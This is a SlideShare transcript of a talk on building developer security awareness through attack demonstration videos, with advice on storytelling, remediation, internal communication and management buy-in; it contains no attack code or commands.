Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
CREATING DEVELOPER SECURITY
AWARENESS: USING ATTACKS
David Klassen
TL;DR
INTRODUCTION
• Evolving methods of communicating security problems to developers:
• OWASP AppSec Tutorial Series : Shock v...
ENCHILADA
FOG OF SECURITY RE-ENGINEERING
• Some bugs get fixed… but the pen-testers
continually report issues that are not fixed
and...
PILE IT HIGH
• After working in software security you might start thinking like a philosopher:
• While an XSS might divulg...
RAISE THE BOO-YAH
• Use attacks that have been used in
reality, and discussed in the news.
• See if you can’t pair common ...
FILTER THE BS
• YouTube is great and I have seen great videos
there, but its nothing you can show your
company usually
• T...
GET OVER THE AWARENESS BUSINESS
• The executives talked about raising awareness
• However when it came to meeting the
expe...
KEEP IT ORGANIC
• If you create a company directed security
promotional like this, which you can post
links to it everywhe...
GET THE FACTS
• I spent time, effort, and money to chase down exploitation
beyond session cookies, because it seemed inter...
DREAM BIG
• Focus on your attacks first. Your story.
• Everyone has heard about hacking
• We mix in legalities and $kirt t...
PERFECTING YOUR ATTACKS
• To be honest I hate the spy concept
• But considering our industry it works
• Ensure you exhaust...
PERFECTING THE EXPLANATION
• No exploitation, no explanation
• Tell the whole story and real risks
• Yes it is a bad subje...
DO THE POST-MORTEM
• Mastered attack -> easier explanations
• Tie it back to reality in the simple or hard
• Show the proo...
A STORY BUILDS IT UP
• A video that displays real compromise
should be easy to create a story for
• It also might mix with...
WHY DO WE CARE?
• They are not going to get it… So!
• Make a laughing stock of yourself
• Phishing intro: the first thing ...
HOW DID WE FIND THE BUG?
• Are we ever asked to fix the bugs?
• Do Devs become security conscious
because they know how to...
REMEDIATE
• Go beyond insults to engineering
• No one is perfect. We need a common
ground for discussion make one.
• Some ...
SOCIAL
EXPLAIN THE EQUIPMENT
• Are we fighting this battle bare handed?
• Explaining prevention can be simple…
• For RCE it is ha...
JU$TFICATION
• Who? Me? If not you who else can/will?
• There is lots of philosophy in business, but
try not to get caught...
IDENTIFYING WITH MANAGEMENT
• Accountability: is another word for this
• Luckily you are not alone. People have
been selli...
THE GOLDEN BLUEBERRY
• Here is my magic word slide (Secret Sauce)
• Rethink the video so you sell it to the group
• Not ma...
GIVE IT A GOOD HOME
• Ask others where the best place to
showcase it is. Find usual locations.
• Some place that has high ...
COMMUNICATE IT
• If you have created something new
• If you are really interested in it
• Make it a big deal
• Invite the ...
IN PERSON DISCUSSIONS
• Book a good time for everyone, or
plan to have multiple meetings
• Create a slide deck that covers...
TALKING SHOP
• These slides can be a bit boring, but the
topic isn’t boring, try to keep it exciting
• The talk is going t...
RESULTS
• From my experience, not sure if they are listening
• Its like you are working with silence, not people
• The imp...
HERE’S WHAT I THINK WORKS
• If you think you have covered it
all, have you managed to cover:
• Monitor
• Attack
• Preventi...
GET THE PEOPLE LISTENING
• AS: Learn more about why developers
don’t want to fix the problems, instead
of debating probabi...
ISSUE IMMERSION
• Ideally you have researched:
• the exploitation topics
• the corporate vulnerability history
• Stayed aw...
SEE THE SLIDE NOTES FOR MORE !!!
Creating Developer Security Awareness
Upcoming SlideShare
Loading in …5
×

Creating Developer Security Awareness

1,461 views

Published on

Would you like your software development staff to think longer and harder about the software they create? Create some awareness material for them that demonstrates how software can be attacked.

Published in: Design
  • Be the first to comment

  • Be the first to like this

Creating Developer Security Awareness

  1. 1. CREATING DEVELOPER SECURITY AWARENESS: USING ATTACKS David Klassen
  2. 2. TL;DR
  3. 3. INTRODUCTION • Evolving methods of communicating security problems to developers: • OWASP AppSec Tutorial Series : Shock value, easily demonstrates risk/prevention • I have noticed that web developers really take-to powerful/short introductions • Michael Howard @ OWASP AppSecUSA in 2012 : • won't work if its too long or overloads the listeners (retention?) • best done in short presentations that can quickly explain (ie. Zest/Punch) • Have a whole website(book?) available for people looking for more clarification • It is hard to find good information that couples vulns with attacks, and fixes • You can tell them to fix, but if you don’t W5 the issues, things get dropped • Somehow security groups need to model to others what is at risk in an attack • Remind them why we want to prevent attacks, and cite reputation issues
  4. 4. ENCHILADA
  5. 5. FOG OF SECURITY RE-ENGINEERING • Some bugs get fixed… but the pen-testers continually report issues that are not fixed and probably won’t get fixed. • Flaw is buried in the most popular feature • You’ve performed or reviewed the millionth assessment with bug X. • You’ve had that 24th meeting… • Burn out is here and even you need relief • Its time to take an issue with Awareness, somehow blow them out of the water! • Pick your darkest bug set and detail what exploitation might look like…
  6. 6. PILE IT HIGH • After working in software security you might start thinking like a philosopher: • While an XSS might divulge a user's session cookie, and even that is a really really critical issue to fix, certain individuals might rightly state, well a login provided to such and such a feature has no access to anything important. • So you see what this XSS provides to an attacker doesn't really mean anything, because that webapp has no access to critical information assets??? • What such a response glosses over, is that exposing a User's session cookie is only just one issue of a plethora of other possible attack vectors (via. RCE) • Everyone knows that SecBug X is bad ass however, “they don’t know how…” • Actually you don’t really know, lets start to build some kind of integrity here • By debunking the arguments and rebuttals provided, we bring people closer
  7. 7. RAISE THE BOO-YAH • Use attacks that have been used in reality, and discussed in the news. • See if you can’t pair common bug X with this real attack payload, so they can later look up and learn about it. • Don’t allow yourself to make a boring communication. Make it with pizazz! • Get yourself excited about the problems, by taking the training. • There are lots of security training groups out there (get up-to-date). • Don’t cheap-out telling yourself I can learn this on my own (time == $$$).
  8. 8. FILTER THE BS • YouTube is great and I have seen great videos there, but its nothing you can show your company usually • The is a certain way of being cool cat that really isn’t that cool. In a year or two its not cool • If you want the audience for your video to actually be people who develop software you are going to need to adapt to meet their needs • If we don’t take developers all the way to s-hell, then were not really taking them anywhere • Is making it simple not your job? Then stay solo • Look at the experts in communication do they skirt around the issues, or aim for the heart?
  9. 9. GET OVER THE AWARENESS BUSINESS • The executives talked about raising awareness • However when it came to meeting the expectations of your common developer… • When I started making presentations and videos to summarize, everything just felt better. • After creating this video I noticed the executives subscribed to an official set of security awareness material • As I look at what was out there though, I realized I am a party of one, and really the only one with an incentive to learn more. • There are many hats you can wear in this business, but which one will have an effect?
  10. 10. KEEP IT ORGANIC • If you create a company directed security promotional like this, which you can post links to it everywhere: • Wiki • Bug Pages • e-mails • chat • etc. • There are more chances for people to run across it in their everyday work • By peaking people’s interest, we are exposing the worst of issues and trying to steer people towards real risks. • Helping the company to build integrity.
  11. 11. GET THE FACTS • I spent time, effort, and money to chase down exploitation beyond session cookies, because it seemed interesting to me, and I didn’t remember seeing this anywhere: • Research the topic • Listen to podcasts/conference talks • Speak to others (hardest) • Take the training • Can we find it in our own code anywhere? (Do it.) • If we consider it APT-possible, what things can happen? • By trying to attempt to understand what is attackable, we have a better awareness of what is probable • We will also learn about the protection others believe is there
  12. 12. DREAM BIG • Focus on your attacks first. Your story. • Everyone has heard about hacking • We mix in legalities and $kirt the field • I wanted to work in software devel • I didn’t want to be a QA any more • I ended up finding quite a few vulns • I knew the vulns were bad but not how • As paid employee legally this info is? • Enlighten on these scary predicaments
  13. 13. PERFECTING YOUR ATTACKS • To be honest I hate the spy concept • But considering our industry it works • Ensure you exhaust all your resources • When you find that last morcel Boom! • Aurora video I found online did it • If I didn’t search long enough? • After its starts rolling for you, perfect it • Legitimate attack scenario is not easy • Task of explaining to others is hard
  14. 14. PERFECTING THE EXPLANATION • No exploitation, no explanation • Tell the whole story and real risks • Yes it is a bad subject, but its also work • Practiced attack gives you domain info • Record your video as if for strangers • Use all the VMs/tools, and cut it out later • Explanations demand more video/story • After you have perfected attack and explanations video, create a script • Working back from this you will find introduction tie-ins and more.
  15. 15. DO THE POST-MORTEM • Mastered attack -> easier explanations • Tie it back to reality in the simple or hard • Show the proof of what happened • Relate to other attacks: CJ of FB login • In some way all attacks are the same • Good place for lead-ins to other vulns • Emphasize the attack line if important • Doing this well, leads to a good intro • I wanted to jump into the fix, but it didn’t make sense quite yet to do that • Make it as detailed as necessary
  16. 16. A STORY BUILDS IT UP • A video that displays real compromise should be easy to create a story for • It also might mix with real life (A/V) • If you get better ideas just go for it • Redo’s are common with a new script • Video editing software is so buggy! • New ideas will come, weigh the value • It is best to at least cover these: 1. Something everyone has heard/seen 2. A full exploit that hits fast and deep 3. A fast automated attack • People should start to think differently
  17. 17. WHY DO WE CARE? • They are not going to get it… So! • Make a laughing stock of yourself • Phishing intro: the first thing in my mind • Later it felt sarcastic, and a good vice • It made the problem more plain to see • I was hoping someone would laugh, and then run smack into realization • That’s just it! A real XSS exploit appears to be just like any other web page • It is important to realize that a website can be made to do anything and developers are in charge of appearance
  18. 18. HOW DID WE FIND THE BUG? • Are we ever asked to fix the bugs? • Do Devs become security conscious because they know how to program? • Show Devs how to consider STDD • This might lead to something else, like the discovery of problematic ThirdParty code • Let them know about SAST/DAST • Detection knowledge leads to prevention • Attempt to include your product or company in the video • Bring up reputation and liability issues
  19. 19. REMEDIATE • Go beyond insults to engineering • No one is perfect. We need a common ground for discussion make one. • Some bugs might be simple to fix • RCE bugs are anything but simple because the fault is in the genetics • When dealing with RCEs go deep • Try to use the best sources/definitions • Provide them framework suggestions • Map the entire issue lifecycle + fix • RCE preventions and counter-measures
  20. 20. SOCIAL
  21. 21. EXPLAIN THE EQUIPMENT • Are we fighting this battle bare handed? • Explaining prevention can be simple… • For RCE it is hard, so go as far as required • OWASP XSS Prevention was thorough, but I had to bow out and exit stage left (time) • Don’t go so deep that no one is listening • If they don’t watch it, they can’t mock • Make it fun, but try not to waste time • Aim to gain the respect of your groups • Use a Dev-possible mindset for awareness • Create wiki page detailing equipment
  22. 22. JU$TFICATION • Who? Me? If not you who else can/will? • There is lots of philosophy in business, but try not to get caught up in the rat race • Be prepared to justify your videos/cause • Make your video respect worthy • Put your own time into it, or just go home • Having security training is good, but an in person explanation can be specific • Be prepared to poke holes in the other strategies presented by management • There is no fail in attempting to help… • If you think your failing, speak to others!
  23. 23. IDENTIFYING WITH MANAGEMENT • Accountability: is another word for this • Luckily you are not alone. People have been selling security to other people, since before we had democracies… • Look-up some of these people. Metricon • Many reports out there to reference/facts • Statistics not there? Use news headlines • Make friends with the management team. • If you’re an employee don’t shame us… • The reason you start with report citations, is to make it a business issue; not personal
  24. 24. THE GOLDEN BLUEBERRY • Here is my magic word slide (Secret Sauce) • Rethink the video so you sell it to the group • Not management heavy? Your lucky! • A report will help to bring it to the business • Introduce the issue typical way (atypical?) • Start where they are at, but carve the path • I used vulnerability finding to put it in scope, something that DEV might have seen before • Every “Seminar” has a magic sales slide • You can do it, feel the magic, believe it • Don’t forget everyone is special… in that they have a chance in this life (in some way)
  25. 25. GIVE IT A GOOD HOME • Ask others where the best place to showcase it is. Find usual locations. • Some place that has high visibility where people look all the time • I recommend an internal location • Don’t post it on youtube, if it is any good it will contains privileged info • If awareness doesn’t make people question things, what is it doing? • If your company is small or lean enough, perhaps other methods will work better. Are they listening? • Perhaps a general video that describes key industry issues.
  26. 26. COMMUNICATE IT • If you have created something new • If you are really interested in it • Make it a big deal • Invite the dev teams you work with, and anyone else interested • Send them an introduction e-mail with a good link to your video. • Ask them to watch the video, and consider coming out to discuss it • Ask everyone when they want to meet • Plan Lunch and Learn for small groups • If you have a large group have an open forum, and invite discussions…
  27. 27. IN PERSON DISCUSSIONS • Book a good time for everyone, or plan to have multiple meetings • Create a slide deck that covers all the issues they might need to know. • We can answer questions, but if no one has any questions, have it ALL • From recent issues to academic • Ask the audience questions (reflect) • Attack – history, variations, and risk • Exploitation – how far does it go? • Detection – perform tests to check • Prevention – library features etc. • Monitoring – is it in the logs? OODA • Protection – Policies/Controls available
  28. 28. TALKING SHOP • These slides can be a bit boring, but the topic isn’t boring, try to keep it exciting • The talk is going to reflect your wiki and aim to completely cover the issue • Engage with the audience • Make sure they understand the depth of the problems. Ask for their opinion • What did XSS allow us to do to victim? • Steal their cookie jar? • Or insert a key logger? • We want to highlight their knowledge • If no one is answering questions, ask them why, learn to communicate
  29. 29. RESULTS • From my experience, not sure if they are listening • Its like you are working with silence, not people • The important part is that they have been told • If they understand this… watering hole, malverts? • We are trying to get them to think about it • Developers who get it are really rare • However those who do can really help you out • Reach horizontally and vertically in your corp. • HR can help with spreading some messages • Alter corporate processes and remove oversights • The whole goal here is to help the team work well
  30. 30. HERE’S WHAT I THINK WORKS • If you think you have covered it all, have you managed to cover: • Monitor • Attack • Prevention • Protection • Exploitation / Explanation • Detection • In other words, is the issue MAPPED? • We often spew vulns not explanations • We need to gain engineering buy- in, where money is king, security has a cost • There are so many experts who say this
  31. 31. GET THE PEOPLE LISTENING • AS: Learn more about why developers don’t want to fix the problems, instead of debating probability of attack • We need to be creative about how we get Development into the discussion • JW: We need to remember Software Priorities According to Developers are: 1. Expected functions and features 2. Performance 3. Usability 4. Uptime 5. Maintainability 6. Security • If we can do 1-5, then probably Security
  32. 32. ISSUE IMMERSION • Ideally you have researched: • the exploitation topics • the corporate vulnerability history • Stayed aware for your company: • full-disclosure, bugtraq etc. • or out there through other sources • Participated in: • penetration tests on assets • leading the bug triaging process • assessment/reviews on your group • Good sources for a starting point
  33. 33. SEE THE SLIDE NOTES FOR MORE !!!

×